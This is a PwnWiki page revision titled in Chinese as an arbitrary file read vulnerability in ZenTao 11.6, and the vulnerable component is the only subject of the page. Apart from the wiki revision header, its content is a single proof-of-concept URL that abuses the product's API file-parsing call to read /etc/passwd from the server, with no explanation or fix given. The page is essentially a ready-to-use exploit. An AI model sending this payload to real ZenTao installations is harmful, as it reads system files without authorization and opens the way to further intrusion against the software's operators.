禪道 11.6 任意文件讀取漏洞

From PwnWiki
Revision as of 17:23, 11 April 2021 by Pwnwiki (talk | contribs) (Created page with "==POC== <pre> http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd </pre>")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd